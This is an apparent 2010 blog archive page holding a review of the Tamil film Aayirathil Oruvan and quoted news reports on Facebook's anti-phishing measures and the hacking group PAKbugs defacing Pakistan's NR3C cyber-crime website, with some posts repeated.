Regarding this topic, Jake Brill, Facebook representative and Project Manager in Facebook's Integrity Team, had this to say, “We invest in dedicated teams and advanced technical systems that detect and block suspicious behavior. When we find a message with a link to a fake login page or other malicious website, we prevent it from being sent and delete all instances of it from the site.” He added that “We also work with third parties to get malicious sites added to browser blacklists or removed completely.”
Users can learn more on this offer by visiting McAfee's Facebook page and clicking on the “Protect Your PC” tab.
Facebook has set up a Security Page for updates and tutorials on issues and topics concerning the site's security."
Friday, January 15, 2010
Aayirathil Oruvan - Review
Aayirathil oruvan (ஆயிரத்தில் ஒருவன்)
An another extra-ordinary movie by Selvaraghavan, The story starts with the Chola Dynasty… Last prince of Chola is taken away from the kingdom to save him from the Pandiya’s. Also with him they take the God Statue of the Pandiya’s.
The place where the Chola Prince is taken is a secret and also there are 7 major traps in the way. Andrea’s father Prathap pothan goes over and finds the Place but he gets disappeared. Then Reema Sen, Andrea, with military people and some porters, in which the Karthik is person who leads the porter’s gang, goes over to the place to find Prathap Pothan and the lost prince city. How they find the chola prince and Prathap pothan is the story & what happens to the Pandiyas Statue.
I was very much excited in watching the movie…. The first half goes on with lots of fun and excitement, the song ‘Oh Easa’ and ‘Un mela Asai’ are awesome and the picturing was excellent.
Second half totally changes the pace of the movie and there are lots of pure tamil conversations, which I very hard for us to understand. Performance of Parthiban, Reema Sen was excellent in the second half. Karthi rocks in the first half.
This movie is really a 1 in 1000 movie. No one can think like this… Must to watch... Also to be noted the movie contains all bad words in Tamil and English, also the movie can’t be enjoyed by all type of audience, mainly you can’t watch the movie with family for sure.
I liked the movie a lot… Except the last 20 mins which was little odd for the pace of the movie.
An another extra-ordinary movie by Selvaraghavan, The story starts with the Chola Dynasty… Last prince of Chola is taken away from the kingdom to save him from the Pandiya’s. Also with him they take the God Statue of the Pandiya’s.
The place where the Chola Prince is taken is a secret and also there are 7 major traps in the way. Andrea’s father Prathap pothan goes over and finds the Place but he gets disappeared. Then Reema Sen, Andrea, with military people and some porters, in which the Karthik is person who leads the porter’s gang, goes over to the place to find Prathap Pothan and the lost prince city. How they find the chola prince and Prathap pothan is the story & what happens to the Pandiyas Statue.
I was very much excited in watching the movie…. The first half goes on with lots of fun and excitement, the song ‘Oh Easa’ and ‘Un mela Asai’ are awesome and the picturing was excellent.
Second half totally changes the pace of the movie and there are lots of pure tamil conversations, which I very hard for us to understand. Performance of Parthiban, Reema Sen was excellent in the second half. Karthi rocks in the first half.
This movie is really a 1 in 1000 movie. No one can think like this… Must to watch... Also to be noted the movie contains all bad words in Tamil and English, also the movie can’t be enjoyed by all type of audience, mainly you can’t watch the movie with family for sure.
I liked the movie a lot… Except the last 20 mins which was little odd for the pace of the movie.
Monday, January 11, 2010
Pakistani National Response Center for Cyber Crimes Website Defaced
Pakistani National Response Center for Cyber Crimes Website Defaced - Hackers claim they downloaded the e-mail database too - Softpedia:
"The website of the Pakistani National Response Center for Cyber Crimes was defaced yesterday and hackers mocked the institution through a message on the first page. Furthermore, the attackers claim to have downloaded the database and emails stored on the server.
The National Response Center for Cyber Crimes (NR3C) is operated by the Federal Investigation Agency (FIA), Pakistan's equivalent of the FBI. The NR3C is similar to the FBI's Internet Crime Complain Center (IC3) as it provides a single point of contact for organizations to report matters related to cyber-crime. It also offers information security training to government, as well as private sector organizations.
The attack was claimed by someone associated with a hacking group called 'PAKbugs.' According to Web defacement archive Zone-H, during 2009, this group was responsible for similar attacks against 1,720 websites, some of them belonging to the Pakistani government.
'Your whole database and e-mails are leaked .... i was really excited to read, see what the [expletive] is private in here lOl,' part of the message left on the NR3C reads. 'I Guess, Federal Investigation Dept of Pakistan is in Wrong, Untalented Hands !!' the hacker says.
In a post on the pakbugs.com forum, a user named ZombiE_KsA, who identifies himself as one of the founders of the PAKbugs-Crew, has posted some screenshots to substantiate his claims. One of the pictures shows him logged into the cPanel Webmail administration interface on nr3c.gov.pk. Zone-H attributes a total of 168 defacements to ZombiE_KsA, out of which 62 are on high-profile websites.
'It seems that from an amateur penetration test a hacker has access at least to the full email database and possibly the backups, of a National Response Center for Cyber Crimes in a highly politically sensitive country. […] To say this hack has national security implications would not be overstating the matter,' writes Rik Ferguson, solutions architect at antivirus vendor Trend Micro.
It is worth pointing out that pakbugs.com was hacked too, back in September 2009. At the time, an unknown hacker made public a list containing the usernames, e-mail addresses and hashed passwords of all forum members. The PAKbugs forum is a well known cyber-crime hub where people exchange illegal information and programs."
"The website of the Pakistani National Response Center for Cyber Crimes was defaced yesterday and hackers mocked the institution through a message on the first page. Furthermore, the attackers claim to have downloaded the database and emails stored on the server.
The National Response Center for Cyber Crimes (NR3C) is operated by the Federal Investigation Agency (FIA), Pakistan's equivalent of the FBI. The NR3C is similar to the FBI's Internet Crime Complain Center (IC3) as it provides a single point of contact for organizations to report matters related to cyber-crime. It also offers information security training to government, as well as private sector organizations.
The attack was claimed by someone associated with a hacking group called 'PAKbugs.' According to Web defacement archive Zone-H, during 2009, this group was responsible for similar attacks against 1,720 websites, some of them belonging to the Pakistani government.
'Your whole database and e-mails are leaked .... i was really excited to read, see what the [expletive] is private in here lOl,' part of the message left on the NR3C reads. 'I Guess, Federal Investigation Dept of Pakistan is in Wrong, Untalented Hands !!' the hacker says.
In a post on the pakbugs.com forum, a user named ZombiE_KsA, who identifies himself as one of the founders of the PAKbugs-Crew, has posted some screenshots to substantiate his claims. One of the pictures shows him logged into the cPanel Webmail administration interface on nr3c.gov.pk. Zone-H attributes a total of 168 defacements to ZombiE_KsA, out of which 62 are on high-profile websites.
'It seems that from an amateur penetration test a hacker has access at least to the full email database and possibly the backups, of a National Response Center for Cyber Crimes in a highly politically sensitive country. […] To say this hack has national security implications would not be overstating the matter,' writes Rik Ferguson, solutions architect at antivirus vendor Trend Micro.
It is worth pointing out that pakbugs.com was hacked too, back in September 2009. At the time, an unknown hacker made public a list containing the usernames, e-mail addresses and hashed passwords of all forum members. The PAKbugs forum is a well known cyber-crime hub where people exchange illegal information and programs."
Subscribe to:
Posts (Atom)